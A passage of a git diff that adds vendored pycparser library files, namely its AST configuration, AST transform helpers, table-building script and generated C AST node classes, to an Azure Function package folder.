+ """ + for c in node: + self.visit(c) + +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py new file mode 100644 index 0000000..7f46a99 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py @@ -0,0 +1,37 @@ +#----------------------------------------------------------------- +# pycparser: _build_tables.py +# +# A dummy for generating the lexing/parsing tables and and +# compiling them into .pyc for faster execution in optimized mode. +# Also generates AST code from the configuration file. +# Should be called from the pycparser directory. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +# Insert '.' and '..' as first entries to the search path for modules. +# Restricted environments like embeddable python do not include the +# current working directory on startup. +import sys +sys.path[0:0] = ['.', '..'] + +# Generate c_ast.py +from _ast_gen import ASTCodeGenerator +ast_gen = ASTCodeGenerator('_c_ast.cfg') +ast_gen.generate(open('c_ast.py', 'w')) + +from pycparser import c_parser + +# Generates the tables +# +c_parser.CParser( + lex_optimize=True, + yacc_debug=False, + yacc_optimize=True) + +# Load to compile into .pyc +# +import lextab +import yacctab +import c_ast diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg new file mode 100644 index 0000000..bbcf06b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg @@ -0,0 +1,195 @@ +#----------------------------------------------------------------- +# pycparser: _c_ast.cfg +# +# Defines the AST Node classes used in pycparser. +# +# Each entry is a Node sub-class name, listing the attributes +# and child nodes of the class: +# * - a child node +# ** - a sequence of child nodes +# - an attribute +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +# ArrayDecl is a nested declaration of an array with the given type. +# dim: the dimension (for example, constant 42) +# dim_quals: list of dimension qualifiers, to support C99's allowing 'const' +# and 'static' within the array dimension in function declarations. +ArrayDecl: [type*, dim*, dim_quals] + +ArrayRef: [name*, subscript*] + +# op: =, +=, /= etc. +# +Assignment: [op, lvalue*, rvalue*] + +Alignas: [alignment*] + +BinaryOp: [op, left*, right*] + +Break: [] + +Case: [expr*, stmts**] + +Cast: [to_type*, expr*] + +# Compound statement in C99 is a list of block items (declarations or +# statements). +# +Compound: [block_items**] + +# Compound literal (anonymous aggregate) for C99. +# (type-name) {initializer_list} +# type: the typename +# init: InitList for the initializer list +# +CompoundLiteral: [type*, init*] + +# type: int, char, float, string, etc. +# +Constant: [type, value] + +Continue: [] + +# name: the variable being declared +# quals: list of qualifiers (const, volatile) +# funcspec: list function specifiers (i.e. inline in C99) +# storage: list of storage specifiers (extern, register, etc.) 
+# type: declaration type (probably nested with all the modifiers) +# init: initialization value, or None +# bitsize: bit field size, or None +# +Decl: [name, quals, align, storage, funcspec, type*, init*, bitsize*] + +DeclList: [decls**] + +Default: [stmts**] + +DoWhile: [cond*, stmt*] + +# Represents the ellipsis (...) parameter in a function +# declaration +# +EllipsisParam: [] + +# An empty statement (a semicolon ';' on its own) +# +EmptyStatement: [] + +# Enumeration type specifier +# name: an optional ID +# values: an EnumeratorList +# +Enum: [name, values*] + +# A name/value pair for enumeration values +# +Enumerator: [name, value*] + +# A list of enumerators +# +EnumeratorList: [enumerators**] + +# A list of expressions separated by the comma operator. +# +ExprList: [exprs**] + +# This is the top of the AST, representing a single C file (a +# translation unit in K&R jargon). It contains a list of +# "external-declaration"s, which is either declarations (Decl), +# Typedef or function definitions (FuncDef). +# +FileAST: [ext**] + +# for (init; cond; next) stmt +# +For: [init*, cond*, next*, stmt*] + +# name: Id +# args: ExprList +# +FuncCall: [name*, args*] + +# type (args) +# +FuncDecl: [args*, type*] + +# Function definition: a declarator for the function name and +# a body, which is a compound statement. +# There's an optional list of parameter declarations for old +# K&R-style definitions +# +FuncDef: [decl*, param_decls**, body*] + +Goto: [name] + +ID: [name] + +# Holder for types that are a simple identifier (e.g. the built +# ins void, char etc. and typedef-defined types) +# +IdentifierType: [names] + +If: [cond*, iftrue*, iffalse*] + +# An initialization list used for compound literals. +# +InitList: [exprs**] + +Label: [name, stmt*] + +# A named initializer for C99. +# The name of a NamedInitializer is a sequence of Nodes, because +# names can be hierarchical and contain constant expressions. +# +NamedInitializer: [name**, expr*] + +# a list of comma separated function parameter declarations +# +ParamList: [params**] + +PtrDecl: [quals, type*] + +Return: [expr*] + +StaticAssert: [cond*, message*] + +# name: struct tag name +# decls: declaration of members +# +Struct: [name, decls**] + +# type: . or -> +# name.field or name->field +# +StructRef: [name*, type, field*] + +Switch: [cond*, stmt*] + +# cond ? iftrue : iffalse +# +TernaryOp: [cond*, iftrue*, iffalse*] + +# A base type declaration +# +TypeDecl: [declname, quals, align, type*] + +# A typedef declaration. +# Very similar to Decl, but without some attributes +# +Typedef: [name, quals, storage, type*] + +Typename: [name, quals, align, type*] + +UnaryOp: [op, expr*] + +# name: union tag name +# decls: declaration of members +# +Union: [name, decls**] + +While: [cond*, stmt*] + +Pragma: [string] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py new file mode 100644 index 0000000..68915d4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py @@ -0,0 +1,164 @@ +#------------------------------------------------------------------------------ +# pycparser: ast_transforms.py +# +# Some utilities used by the parser to create a friendlier AST. 
+#
+# Eli Bendersky [https://eli.thegreenplace.net/]
+# License: BSD
+#------------------------------------------------------------------------------
+
+from . import c_ast
+
+
+def fix_switch_cases(switch_node):
+    """ The 'case' statements in a 'switch' come out of parsing with one
+        child node, so subsequent statements are just tucked to the parent
+        Compound. Additionally, consecutive (fall-through) case statements
+        come out messy. This is a peculiarity of the C grammar. The following:
+
+            switch (myvar) {
+                case 10:
+                    k = 10;
+                    p = k + 1;
+                    return 10;
+                case 20:
+                case 30:
+                    return 20;
+                default:
+                    break;
+            }
+
+        Creates this tree (pseudo-dump):
+
+            Switch
+                ID: myvar
+                Compound:
+                    Case 10:
+                        k = 10
+                    p = k + 1
+                    return 10
+                    Case 20:
+                        Case 30:
+                            return 20
+                    Default:
+                        break
+
+        The goal of this transform is to fix this mess, turning it into the
+        following:
+
+            Switch
+                ID: myvar
+                Compound:
+                    Case 10:
+                        k = 10
+                        p = k + 1
+                        return 10
+                    Case 20:
+                    Case 30:
+                        return 20
+                    Default:
+                        break
+
+        A fixed AST node is returned. The argument may be modified.
+    """
+    assert isinstance(switch_node, c_ast.Switch)
+    if not isinstance(switch_node.stmt, c_ast.Compound):
+        return switch_node
+
+    # The new Compound child for the Switch, which will collect children in the
+    # correct order
+    new_compound = c_ast.Compound([], switch_node.stmt.coord)
+
+    # The last Case/Default node
+    last_case = None
+
+    # Goes over the children of the Compound below the Switch, adding them
+    # either directly below new_compound or below the last Case as appropriate
+    # (for `switch(cond) {}`, block_items would have been None)
+    for child in (switch_node.stmt.block_items or []):
+        if isinstance(child, (c_ast.Case, c_ast.Default)):
+            # If it's a Case/Default:
+            # 1. Add it to the Compound and mark as "last case"
+            # 2. If its immediate child is also a Case or Default, promote it
+            #    to a sibling.
+            new_compound.block_items.append(child)
+            _extract_nested_case(child, new_compound.block_items)
+            last_case = new_compound.block_items[-1]
+        else:
+            # Other statements are added as children to the last case, if it
+            # exists.
+            if last_case is None:
+                new_compound.block_items.append(child)
+            else:
+                last_case.stmts.append(child)
+
+    switch_node.stmt = new_compound
+    return switch_node
+
+
+def _extract_nested_case(case_node, stmts_list):
+    """ Recursively extract consecutive Case statements that are made nested
+        by the parser and add them to the stmts_list.
+    """
+    if isinstance(case_node.stmts[0], (c_ast.Case, c_ast.Default)):
+        stmts_list.append(case_node.stmts.pop())
+        _extract_nested_case(stmts_list[-1], stmts_list)
+
+
+def fix_atomic_specifiers(decl):
+    """ Atomic specifiers like _Atomic(type) are unusually structured,
+        conferring a qualifier upon the contained type.
+
+        This function fixes a decl with atomic specifiers to have a sane AST
+        structure, by removing spurious Typename->TypeDecl pairs and attaching
+        the _Atomic qualifier in the right place.
+    """
+    # There can be multiple levels of _Atomic in a decl; fix them until a
+    # fixed point is reached.
+    while True:
+        decl, found = _fix_atomic_specifiers_once(decl)
+        if not found:
+            break
+
+    # Make sure to add an _Atomic qual on the topmost decl if needed. Also
+    # restore the declname on the innermost TypeDecl (it gets placed in the
+    # wrong place during construction).
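+    # A rough sketch of the effect (assuming a decl like `_Atomic(int) *p;`):
+    # the loop below walks down to the innermost TypeDecl; an '_Atomic' qual
+    # that only survived on that TypeDecl is mirrored onto decl.quals, and a
+    # declname lost during construction is restored there from decl.name.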
+ typ = decl + while not isinstance(typ, c_ast.TypeDecl): + try: + typ = typ.type + except AttributeError: + return decl + if '_Atomic' in typ.quals and '_Atomic' not in decl.quals: + decl.quals.append('_Atomic') + if typ.declname is None: + typ.declname = decl.name + + return decl + + +def _fix_atomic_specifiers_once(decl): + """ Performs one 'fix' round of atomic specifiers. + Returns (modified_decl, found) where found is True iff a fix was made. + """ + parent = decl + grandparent = None + node = decl.type + while node is not None: + if isinstance(node, c_ast.Typename) and '_Atomic' in node.quals: + break + try: + grandparent = parent + parent = node + node = node.type + except AttributeError: + # If we've reached a node without a `type` field, it means we won't + # find what we're looking for at this point; give up the search + # and return the original decl unmodified. + return decl, False + + assert isinstance(parent, c_ast.TypeDecl) + grandparent.type = node.type + if '_Atomic' not in node.type.quals: + node.type.quals.append('_Atomic') + return decl, True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py new file mode 100644 index 0000000..7fe103c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py @@ -0,0 +1,1125 @@ +#----------------------------------------------------------------- +# ** ATTENTION ** +# This code was automatically generated from the file: +# _c_ast.cfg +# +# Do not modify it directly. Modify the configuration file and +# run the generator again. +# ** ** *** ** ** +# +# pycparser: c_ast.py +# +# AST Node classes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + + +import sys + +def _repr(obj): + """ + Get the representation of an object, with dedicated pprint-like format for lists. + """ + if isinstance(obj, list): + return '[' + (',\n '.join((_repr(e).replace('\n', '\n ') for e in obj))) + '\n]' + else: + return repr(obj) + +class Node(object): + __slots__ = () + """ Abstract base class for AST nodes. + """ + def __repr__(self): + """ Generates a python representation of the current node + """ + result = self.__class__.__name__ + '(' + + indent = '' + separator = '' + for name in self.__slots__[:-2]: + result += separator + result += indent + result += name + '=' + (_repr(getattr(self, name)).replace('\n', '\n ' + (' ' * (len(name) + len(self.__class__.__name__))))) + + separator = ',' + indent = '\n ' + (' ' * len(self.__class__.__name__)) + + result += indent + ')' + + return result + + def children(self): + """ A sequence of all children that are Nodes + """ + pass + + def show(self, buf=sys.stdout, offset=0, attrnames=False, nodenames=False, showcoord=False, _my_node_name=None): + """ Pretty print the Node and all its attributes and + children (recursively) to a buffer. + + buf: + Open IO buffer into which the Node is printed. + + offset: + Initial offset (amount of leading spaces) + + attrnames: + True if you want to see the attribute names in + name=value pairs. False to only see the values. + + nodenames: + True if you want to see the actual node names + within their parents. + + showcoord: + Do you want the coordinates of each Node to be + displayed. 
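+
+            For example (a sketch):
+                ast.show(attrnames=True, nodenames=True)
+            prints each node as `ClassName <child_name>: attr=value, ...`.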
+ """ + lead = ' ' * offset + if nodenames and _my_node_name is not None: + buf.write(lead + self.__class__.__name__+ ' <' + _my_node_name + '>: ') + else: + buf.write(lead + self.__class__.__name__+ ': ') + + if self.attr_names: + if attrnames: + nvlist = [(n, getattr(self,n)) for n in self.attr_names] + attrstr = ', '.join('%s=%s' % nv for nv in nvlist) + else: + vlist = [getattr(self, n) for n in self.attr_names] + attrstr = ', '.join('%s' % v for v in vlist) + buf.write(attrstr) + + if showcoord: + buf.write(' (at %s)' % self.coord) + buf.write('\n') + + for (child_name, child) in self.children(): + child.show( + buf, + offset=offset + 2, + attrnames=attrnames, + nodenames=nodenames, + showcoord=showcoord, + _my_node_name=child_name) + + +class NodeVisitor(object): + """ A base NodeVisitor class for visiting c_ast nodes. + Subclass it and define your own visit_XXX methods, where + XXX is the class name you want to visit with these + methods. + + For example: + + class ConstantVisitor(NodeVisitor): + def __init__(self): + self.values = [] + + def visit_Constant(self, node): + self.values.append(node.value) + + Creates a list of values of all the constant nodes + encountered below the given node. To use it: + + cv = ConstantVisitor() + cv.visit(node) + + Notes: + + * generic_visit() will be called for AST nodes for which + no visit_XXX method was defined. + * The children of nodes for which a visit_XXX was + defined will not be visited - if you need this, call + generic_visit() on the node. + You can use: + NodeVisitor.generic_visit(self, node) + * Modeled after Python's own AST visiting facilities + (the ast module of Python 3.0) + """ + + _method_cache = None + + def visit(self, node): + """ Visit a node. + """ + + if self._method_cache is None: + self._method_cache = {} + + visitor = self._method_cache.get(node.__class__.__name__, None) + if visitor is None: + method = 'visit_' + node.__class__.__name__ + visitor = getattr(self, method, self.generic_visit) + self._method_cache[node.__class__.__name__] = visitor + + return visitor(node) + + def generic_visit(self, node): + """ Called if no explicit visitor function exists for a + node. Implements preorder visiting of the node. 
+ """ + for c in node: + self.visit(c) + +class ArrayDecl(Node): + __slots__ = ('type', 'dim', 'dim_quals', 'coord', '__weakref__') + def __init__(self, type, dim, dim_quals, coord=None): + self.type = type + self.dim = dim + self.dim_quals = dim_quals + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.dim is not None: nodelist.append(("dim", self.dim)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.dim is not None: + yield self.dim + + attr_names = ('dim_quals', ) + +class ArrayRef(Node): + __slots__ = ('name', 'subscript', 'coord', '__weakref__') + def __init__(self, name, subscript, coord=None): + self.name = name + self.subscript = subscript + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.subscript is not None: nodelist.append(("subscript", self.subscript)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.subscript is not None: + yield self.subscript + + attr_names = () + +class Assignment(Node): + __slots__ = ('op', 'lvalue', 'rvalue', 'coord', '__weakref__') + def __init__(self, op, lvalue, rvalue, coord=None): + self.op = op + self.lvalue = lvalue + self.rvalue = rvalue + self.coord = coord + + def children(self): + nodelist = [] + if self.lvalue is not None: nodelist.append(("lvalue", self.lvalue)) + if self.rvalue is not None: nodelist.append(("rvalue", self.rvalue)) + return tuple(nodelist) + + def __iter__(self): + if self.lvalue is not None: + yield self.lvalue + if self.rvalue is not None: + yield self.rvalue + + attr_names = ('op', ) + +class Alignas(Node): + __slots__ = ('alignment', 'coord', '__weakref__') + def __init__(self, alignment, coord=None): + self.alignment = alignment + self.coord = coord + + def children(self): + nodelist = [] + if self.alignment is not None: nodelist.append(("alignment", self.alignment)) + return tuple(nodelist) + + def __iter__(self): + if self.alignment is not None: + yield self.alignment + + attr_names = () + +class BinaryOp(Node): + __slots__ = ('op', 'left', 'right', 'coord', '__weakref__') + def __init__(self, op, left, right, coord=None): + self.op = op + self.left = left + self.right = right + self.coord = coord + + def children(self): + nodelist = [] + if self.left is not None: nodelist.append(("left", self.left)) + if self.right is not None: nodelist.append(("right", self.right)) + return tuple(nodelist) + + def __iter__(self): + if self.left is not None: + yield self.left + if self.right is not None: + yield self.right + + attr_names = ('op', ) + +class Break(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Case(Node): + __slots__ = ('expr', 'stmts', 'coord', '__weakref__') + def __init__(self, expr, stmts, coord=None): + self.expr = expr + self.stmts = stmts + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + for i, child in enumerate(self.stmts or []): + nodelist.append(("stmts[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + for child in (self.stmts or []): + yield child + + attr_names = () + +class Cast(Node): + __slots__ = ('to_type', 'expr', 'coord', 
'__weakref__') + def __init__(self, to_type, expr, coord=None): + self.to_type = to_type + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.to_type is not None: nodelist.append(("to_type", self.to_type)) + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.to_type is not None: + yield self.to_type + if self.expr is not None: + yield self.expr + + attr_names = () + +class Compound(Node): + __slots__ = ('block_items', 'coord', '__weakref__') + def __init__(self, block_items, coord=None): + self.block_items = block_items + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.block_items or []): + nodelist.append(("block_items[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.block_items or []): + yield child + + attr_names = () + +class CompoundLiteral(Node): + __slots__ = ('type', 'init', 'coord', '__weakref__') + def __init__(self, type, init, coord=None): + self.type = type + self.init = init + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.init is not None: nodelist.append(("init", self.init)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.init is not None: + yield self.init + + attr_names = () + +class Constant(Node): + __slots__ = ('type', 'value', 'coord', '__weakref__') + def __init__(self, type, value, coord=None): + self.type = type + self.value = value + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('type', 'value', ) + +class Continue(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Decl(Node): + __slots__ = ('name', 'quals', 'align', 'storage', 'funcspec', 'type', 'init', 'bitsize', 'coord', '__weakref__') + def __init__(self, name, quals, align, storage, funcspec, type, init, bitsize, coord=None): + self.name = name + self.quals = quals + self.align = align + self.storage = storage + self.funcspec = funcspec + self.type = type + self.init = init + self.bitsize = bitsize + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.init is not None: nodelist.append(("init", self.init)) + if self.bitsize is not None: nodelist.append(("bitsize", self.bitsize)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.init is not None: + yield self.init + if self.bitsize is not None: + yield self.bitsize + + attr_names = ('name', 'quals', 'align', 'storage', 'funcspec', ) + +class DeclList(Node): + __slots__ = ('decls', 'coord', '__weakref__') + def __init__(self, decls, coord=None): + self.decls = decls + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = () + +class Default(Node): + __slots__ = ('stmts', 'coord', '__weakref__') + def __init__(self, stmts, coord=None): + self.stmts = stmts + self.coord = coord + + def children(self): + nodelist = [] + for i, child in 
enumerate(self.stmts or []): + nodelist.append(("stmts[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.stmts or []): + yield child + + attr_names = () + +class DoWhile(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class EllipsisParam(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class EmptyStatement(Node): + __slots__ = ('coord', '__weakref__') + def __init__(self, coord=None): + self.coord = coord + + def children(self): + return () + + def __iter__(self): + return + yield + + attr_names = () + +class Enum(Node): + __slots__ = ('name', 'values', 'coord', '__weakref__') + def __init__(self, name, values, coord=None): + self.name = name + self.values = values + self.coord = coord + + def children(self): + nodelist = [] + if self.values is not None: nodelist.append(("values", self.values)) + return tuple(nodelist) + + def __iter__(self): + if self.values is not None: + yield self.values + + attr_names = ('name', ) + +class Enumerator(Node): + __slots__ = ('name', 'value', 'coord', '__weakref__') + def __init__(self, name, value, coord=None): + self.name = name + self.value = value + self.coord = coord + + def children(self): + nodelist = [] + if self.value is not None: nodelist.append(("value", self.value)) + return tuple(nodelist) + + def __iter__(self): + if self.value is not None: + yield self.value + + attr_names = ('name', ) + +class EnumeratorList(Node): + __slots__ = ('enumerators', 'coord', '__weakref__') + def __init__(self, enumerators, coord=None): + self.enumerators = enumerators + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.enumerators or []): + nodelist.append(("enumerators[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.enumerators or []): + yield child + + attr_names = () + +class ExprList(Node): + __slots__ = ('exprs', 'coord', '__weakref__') + def __init__(self, exprs, coord=None): + self.exprs = exprs + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.exprs or []): + nodelist.append(("exprs[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.exprs or []): + yield child + + attr_names = () + +class FileAST(Node): + __slots__ = ('ext', 'coord', '__weakref__') + def __init__(self, ext, coord=None): + self.ext = ext + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.ext or []): + nodelist.append(("ext[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.ext or []): + yield child + + attr_names = () + +class For(Node): + __slots__ = ('init', 'cond', 'next', 'stmt', 'coord', '__weakref__') + def __init__(self, init, cond, next, stmt, coord=None): + self.init = init + self.cond = cond + self.next = next + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.init is 
not None: nodelist.append(("init", self.init)) + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.next is not None: nodelist.append(("next", self.next)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.init is not None: + yield self.init + if self.cond is not None: + yield self.cond + if self.next is not None: + yield self.next + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class FuncCall(Node): + __slots__ = ('name', 'args', 'coord', '__weakref__') + def __init__(self, name, args, coord=None): + self.name = name + self.args = args + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.args is not None: nodelist.append(("args", self.args)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.args is not None: + yield self.args + + attr_names = () + +class FuncDecl(Node): + __slots__ = ('args', 'type', 'coord', '__weakref__') + def __init__(self, args, type, coord=None): + self.args = args + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.args is not None: nodelist.append(("args", self.args)) + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.args is not None: + yield self.args + if self.type is not None: + yield self.type + + attr_names = () + +class FuncDef(Node): + __slots__ = ('decl', 'param_decls', 'body', 'coord', '__weakref__') + def __init__(self, decl, param_decls, body, coord=None): + self.decl = decl + self.param_decls = param_decls + self.body = body + self.coord = coord + + def children(self): + nodelist = [] + if self.decl is not None: nodelist.append(("decl", self.decl)) + if self.body is not None: nodelist.append(("body", self.body)) + for i, child in enumerate(self.param_decls or []): + nodelist.append(("param_decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.decl is not None: + yield self.decl + if self.body is not None: + yield self.body + for child in (self.param_decls or []): + yield child + + attr_names = () + +class Goto(Node): + __slots__ = ('name', 'coord', '__weakref__') + def __init__(self, name, coord=None): + self.name = name + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('name', ) + +class ID(Node): + __slots__ = ('name', 'coord', '__weakref__') + def __init__(self, name, coord=None): + self.name = name + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('name', ) + +class IdentifierType(Node): + __slots__ = ('names', 'coord', '__weakref__') + def __init__(self, names, coord=None): + self.names = names + self.coord = coord + + def children(self): + nodelist = [] + return tuple(nodelist) + + def __iter__(self): + return + yield + + attr_names = ('names', ) + +class If(Node): + __slots__ = ('cond', 'iftrue', 'iffalse', 'coord', '__weakref__') + def __init__(self, cond, iftrue, iffalse, coord=None): + self.cond = cond + self.iftrue = iftrue + self.iffalse = iffalse + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.iftrue is not None: nodelist.append(("iftrue", self.iftrue)) + if self.iffalse is not 
None: nodelist.append(("iffalse", self.iffalse)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.iftrue is not None: + yield self.iftrue + if self.iffalse is not None: + yield self.iffalse + + attr_names = () + +class InitList(Node): + __slots__ = ('exprs', 'coord', '__weakref__') + def __init__(self, exprs, coord=None): + self.exprs = exprs + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.exprs or []): + nodelist.append(("exprs[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.exprs or []): + yield child + + attr_names = () + +class Label(Node): + __slots__ = ('name', 'stmt', 'coord', '__weakref__') + def __init__(self, name, stmt, coord=None): + self.name = name + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.stmt is not None: + yield self.stmt + + attr_names = ('name', ) + +class NamedInitializer(Node): + __slots__ = ('name', 'expr', 'coord', '__weakref__') + def __init__(self, name, expr, coord=None): + self.name = name + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + for i, child in enumerate(self.name or []): + nodelist.append(("name[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + for child in (self.name or []): + yield child + + attr_names = () + +class ParamList(Node): + __slots__ = ('params', 'coord', '__weakref__') + def __init__(self, params, coord=None): + self.params = params + self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.params or []): + nodelist.append(("params[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.params or []): + yield child + + attr_names = () + +class PtrDecl(Node): + __slots__ = ('quals', 'type', 'coord', '__weakref__') + def __init__(self, quals, type, coord=None): + self.quals = quals + self.type = type + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + + attr_names = ('quals', ) + +class Return(Node): + __slots__ = ('expr', 'coord', '__weakref__') + def __init__(self, expr, coord=None): + self.expr = expr + self.coord = coord + + def children(self): + nodelist = [] + if self.expr is not None: nodelist.append(("expr", self.expr)) + return tuple(nodelist) + + def __iter__(self): + if self.expr is not None: + yield self.expr + + attr_names = () + +class StaticAssert(Node): + __slots__ = ('cond', 'message', 'coord', '__weakref__') + def __init__(self, cond, message, coord=None): + self.cond = cond + self.message = message + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.message is not None: nodelist.append(("message", self.message)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.message is not None: + yield self.message + + attr_names = () + +class Struct(Node): + __slots__ = ('name', 'decls', 'coord', '__weakref__') + def __init__(self, name, decls, coord=None): + self.name = name + self.decls = decls + 
self.coord = coord + + def children(self): + nodelist = [] + for i, child in enumerate(self.decls or []): + nodelist.append(("decls[%d]" % i, child)) + return tuple(nodelist) + + def __iter__(self): + for child in (self.decls or []): + yield child + + attr_names = ('name', ) + +class StructRef(Node): + __slots__ = ('name', 'type', 'field', 'coord', '__weakref__') + def __init__(self, name, type, field, coord=None): + self.name = name + self.type = type + self.field = field + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.field is not None: nodelist.append(("field", self.field)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.field is not None: + yield self.field + + attr_names = ('type', ) + +class Switch(Node): + __slots__ = ('cond', 'stmt', 'coord', '__weakref__') + def __init__(self, cond, stmt, coord=None): + self.cond = cond + self.stmt = stmt + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.stmt is not None: nodelist.append(("stmt", self.stmt)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.stmt is not None: + yield self.stmt + + attr_names = () + +class TernaryOp(Node): + __slots__ = ('cond', 'iftrue', 'iffalse', 'coord', '__weakref__') + def __init__(self, cond, iftrue, iffalse, coord=None): + self.cond = cond + self.iftrue = iftrue + self.iffalse = iffalse + self.coord = coord + + def children(self): + nodelist = [] + if self.cond is not None: nodelist.append(("cond", self.cond)) + if self.iftrue is not None: nodelist.append(("iftrue", self.iftrue)) + if self.iffalse is not None: nodelist.append(("iffalse", self.iffalse)) + return tuple(nodelist) + + def __iter__(self): + if self.cond is not None: + yield self.cond + if self.iftrue is not None: + yield self.iftrue + if self.iffalse is not None: + yield self.iffalse + + attr_names = () + +class TypeDecl(Node): + __slots__ = ('declname', 'quals', 'align', 'type', 'coord', '__weakref__') + def __init__(self, declname, quals, align, type, coord=None): + self.declname = declname + self.quals = quals + self.align = align 